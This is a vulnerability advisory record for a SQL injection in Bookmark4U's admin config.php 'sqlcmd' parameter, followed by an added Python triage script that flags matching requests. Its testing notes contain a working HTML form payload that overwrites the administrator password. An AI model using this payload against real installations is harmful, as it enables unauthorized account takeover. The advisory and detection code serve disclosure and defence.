Bookmark4U config.php 'sqlcmd' Variable SQL Injection

2006-04-20T08:02:38
ID OSVDB:24795
Type osvdb
Reporter MoHaJaLi(mohajali2k4@gmail.com)
Modified 2006-04-20T08:02:38

Description

Vulnerability Description

Bookmark4U contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the config.php script not properly sanitizing user-supplied input to the 'sqlcmd' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.

Technical Description

While the injection occurs in the 'sqlcmd' variable, the variable 'mode' must be set to the value 'sqlexec' for the injection to occur.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Bookmark4U contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the config.php script not properly sanitizing user-supplied input to the 'sqlcmd' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.

Manual Testing Notes

<form action='http://bookmark4u.sourceforge.net/v2.0.0/admin/config.php' method='post'>
<tr><td align='center'>
<input type='hidden' name='sqlcmd' value="# add a administrator (initial password is 'test') %NL%UPDATE bk4u_passwd SET passwd=PASSWORD('asdfg') WHERE user='admin';">
<input type='hidden' name='mode' value='sqlexec'>
<input type='submit' value="Execute Above (administrator's account)">
</td></tr>
</form></table>
<br><a href='javascript:document.location.reload();'>And Reload this page</a>.</body></html>
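As an added example (not part of the OSVDB record or of Bookmark4U itself), a small Python triage helper that scans captured HTTP requests for the condition described above: a POST to admin/config.php with mode=sqlexec, and reports the SQL statements submitted in sqlcmd. The sample requests are constructed, and treating '%NL%' as a line separator is an assumption taken from the test form, not documented application behaviour.

```python
"""Triage helper for the Bookmark4U config.php 'sqlcmd' issue (OSVDB:24795).

Flags POST requests to admin/config.php that carry mode=sqlexec and lists
the SQL statements submitted in 'sqlcmd', so an analyst can see what a
request would have executed. Sample data is constructed for this example.
"""
from urllib.parse import parse_qs, urlsplit

# Constructed sample of captured requests: (method, url, body).
SAMPLE_REQUESTS = [
    ("GET", "/bookmark4u/index.php", ""),
    ("POST", "/bookmark4u/admin/config.php", "mode=save&sitename=My+Links"),
    ("POST", "/bookmark4u/admin/config.php",
     "sqlcmd=%23+check%25NL%25SELECT+COUNT%28%2A%29+FROM+bk4u_passwd%3B"
     "&mode=sqlexec"),
]


def split_statements(sqlcmd):
    """Split a submitted sqlcmd value into individual SQL statements.

    '#' lines are dropped as comments. '%NL%' is treated as a line break;
    this is an assumption based on the advisory's test form.
    """
    lines = sqlcmd.replace("%NL%", "\n").splitlines()
    code = " ".join(l.strip() for l in lines
                    if l.strip() and not l.lstrip().startswith("#"))
    return [s.strip() for s in code.split(";") if s.strip()]


def triage(requests):
    """Return one finding per POST to admin/config.php with mode=sqlexec."""
    findings = []
    for method, url, body in requests:
        path = urlsplit(url).path
        if method != "POST" or not path.endswith("/admin/config.php"):
            continue
        form = parse_qs(body, keep_blank_values=True)
        if form.get("mode", [""])[0] != "sqlexec":
            continue
        sqlcmd = form.get("sqlcmd", [""])[0]
        findings.append({"path": path, "statements": split_statements(sqlcmd)})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_REQUESTS):
        print(finding["path"], "->", finding["statements"])
```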

References:

Vendor URL: http://bookmark4u.sourceforge.net/
Secunia Advisory ID: 19758
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0517.html
Mail List Post: http://attrition.org/pipermail/vim/2007-February/001373.html
ISS X-Force ID: 25956
FrSIRT Advisory: ADV-2006-1456
CVE-2006-7025